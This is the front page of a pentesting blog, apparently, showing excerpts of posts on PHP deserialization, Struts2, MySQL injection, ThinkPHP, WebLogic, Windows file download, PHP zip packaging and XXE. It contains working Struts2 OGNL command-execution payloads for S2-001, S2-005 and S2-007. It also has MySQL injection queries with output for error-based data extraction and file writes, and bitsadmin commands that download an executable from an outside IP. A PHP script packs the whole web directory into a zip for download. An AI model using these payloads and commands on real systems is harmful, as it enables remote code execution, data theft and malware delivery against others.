Reber's Blog

A little programming, a little pentesting


On PHP SESSION Deserialization

0x00 Environment

The company put out some CTF challenges, saying they wanted to gauge everyone's level and then assign work according to the scores.....

One of them was a PHP deserialization challenge, taken directly from the third web challenge of the preliminary round of the 3rd "4.29 Anheng Cup" Network Security Technology Competition.


Struts 2 Vulnerability Payloads

0x00 S2-001

This vulnerability exists because, when a user submits form data and validation fails, the backend parses the previously submitted parameter values as OGNL expressions (%{value}) and refills the results into the corresponding form fields.
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}

0x01 S2-005

Affected versions: 2.0.0 - 2.1.8.1

http://aa.com/index.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&(asdf)(('%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))')(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1

0x02 S2-007

Affected versions: 2.0.0 - 2.2.3

When a validation rule <ActionName>-validation.xml is configured and type conversion fails during validation, the backend by default concatenates the user-submitted form value into a string, evaluates it once as an OGNL expression, and returns the result.
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

0x03 S2-012

Affected versions: 2.1.0 - 2.3.13


SQL Injection Tips (MySQL)

Environment: MySQL 5.5.47

0x00 Injection point after ORDER BY

mysql> select id,name,content from msg where id>1 order by id into outfile 'C:\\Apps\\phpStudy\\WWW\\a.txt';
Query OK, 1 row affected (0.01 sec)
mysql> select id,name,content from msg where id>1 order by updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~msg~'
mysql> select id,name,content from msg where id>1 order by name procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
mysql> select name from msg where id>1 order by if(1=1,1,(select 1 union select 2));
+----------+
| name     |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row

mysql> select name from msg where id>1 order by (select case when(2>1) then 1 else 1*(select 1 union select 2)end)=1;
+----------+
| name     |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by (select case when(2<1) then 1 else 1*(select 1 union select 2)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row

0x01 Injection point after LIMIT

  • If there is no ORDER BY before the LIMIT, union and analyse() can be used
mysql> select id,name,content from msg where id>1 limit 1,1 union select 1,2,3;
+----+------+---------+
| id | name | content |
+----+------+---------+
|  1 | 2    | 3       |
+----+------+---------+
1 row in set (0.01 sec)

mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse();
+-------------------+---------------+---------------+------------+------------+
| Field_name        | Min_value     | Max_value     | Min_length | Max_length |
+-------------------+---------------+---------------+------------+------------+
| rtest.msg.name    | xiaohong      | xiaohong      |          8 |          8 |
| rtest.msg.content | I have a cat. | I have a cat. |         13 |         13 |
+-------------------+---------------+---------------+------------+------------+

+------------------+-------+-------------------------+------+--------------------------------+
| Empties_or_zeros | Nulls | Avg_value_or_avg_length | Std  | Optimal_fieldtype              |
+------------------+-------+-------------------------+------+--------------------------------+
|                0 |     0 | 8.0000                  | NULL | ENUM('xiaohong') NOT NULL      |
|                0 |     0 | 13.0000                 | NULL | ENUM('I have a cat.') NOT NULL |
+------------------+-------+-------------------------+------+--------------------------------+
2 rows in set (0.00 sec)
  • If there is an ORDER BY before the LIMIT, union and analyse() cannot be used (error-based extraction through analyse(updatexml(...)) still works, as shown below)
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'

mysql> select id,name,content from msg where id>1 order by name limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'

0x02 Obtaining the database, table and column names from error messages

# The database name is rtest
mysql> select id,name,content from msg where id=2-a();
ERROR 1305 (42000): FUNCTION rtest.a does not exist

# The table name is msg
mysql> select id,name,content from msg where id=2 and polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select id,name,content from msg where id=2 and polygon(id);
ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing

# The column names are id, name, content and useragent
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b)c);
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id))c);
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name))c);
ERROR 1060 (42S21): Duplicate column name 'content'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content))c);
ERROR 1060 (42S21): Duplicate column name 'useragent'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content,useragent))c);
ERROR 1241 (21000): Operand should contain 1 column(s)

0x03 MySQL implicit type conversion

Improper use of ThinkPHP5's where function leads to SQL injection

0x00 About the where function in ThinkPHP5

Before the New Year the company commissioned another company to build a website on ThinkPHP 5.0.13, and it had an injection vulnerability. After analysis it turned out to be caused by improper use of tp5's where function: in tp5, where accepts either a string or an array as the query condition, and when the string form is used carelessly it can lead to SQL injection.


WebLogic Deserialization Vulnerability POC (CVE-2017-10271)

0x00 WebLogic WLS Component Deserialization Vulnerability

This vulnerability is CVE-2017-10271. It lies in the wls-wsat component of Oracle WebLogic: the component's XMLDecoder-based deserialization is vulnerable and allows remote code execution, and every version < 10.3.6 is affected. I didn't look at it when it first came out, so I'm writing it up now.


Downloading files and executing remote files from the Windows terminal

Environment: Windows Server 2008 R2 Enterprise

0x00 Downloading files with bitsadmin

bitsadmin /rawreturn /transfer getfile http://114.115.123.123/a.exe C:\Windows\Temp\a.exe
bitsadmin /rawreturn /transfer getpayload http://114.115.123.123/a.zip C:\Windows\Temp\a.zip
bitsadmin /transfer myDownLoadJob /download /priority normal http://114.115.123.123/a.exe C:\Windows\Temp\a.exe

0x01 Downloading files with certutil

Saved to the current directory


Packing PHP files into a zip for download

0x00 The code

<?php

function addFileToZip($zip, $zipname, $path) {
    $handler = opendir($path);
    while (($filename = readdir($handler)) !== false) {
        if ($filename != "." && $filename != ".." && $filename != $zipname) {
            if (is_dir($path . "/" . $filename)) {  // if the entry is a directory, recurse into it
                addFileToZip($zip, $zipname, $path . "/" . $filename);
            } else {
                $zip->addFile($path . "/" . $filename);
            }
        }
    }
    closedir($handler);  // close the directory handle opened above
}

function tar($zipname, $path) {
    $zip = new ZipArchive(); // requires zlib on Linux; on Windows uncomment php_zip.dll in php.ini

    // CREATE | OVERWRITE: create the archive if it does not exist, truncate it if it does
    if ($zip->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) {
        addFileToZip($zip, $zipname, $path);
        $zip->close();
    } else {
        exit('Unable to open file, or file creation failed!');
    }
}

function download($zipname) {
    if (!file_exists($zipname)) {
        exit("Zip file does not exist!");
    }
    header("Cache-Control: public");
    header("Content-Description: File Transfer");
    header('Content-Disposition: attachment; filename=' . basename($zipname)); // file name offered to the browser
    header("Content-Type: application/zip"); // zip format
    header("Content-Transfer-Encoding: binary"); // tell the browser this is a binary file
    header('Content-Length: ' . filesize($zipname)); // tell the browser the file size
    @readfile($zipname);

    unlink($zipname); // remove the archive once it has been sent
}

$zipname = 'bak.zip';
$path = '.';
tar($zipname, $path);
download($zipname);

?>


XXE Vulnerability

0x00 XXE

XML is widely used for configuration files (Spring, Struts2, etc.), document structure description files (PDF, RSS, etc.) and image format files (SVG headers).
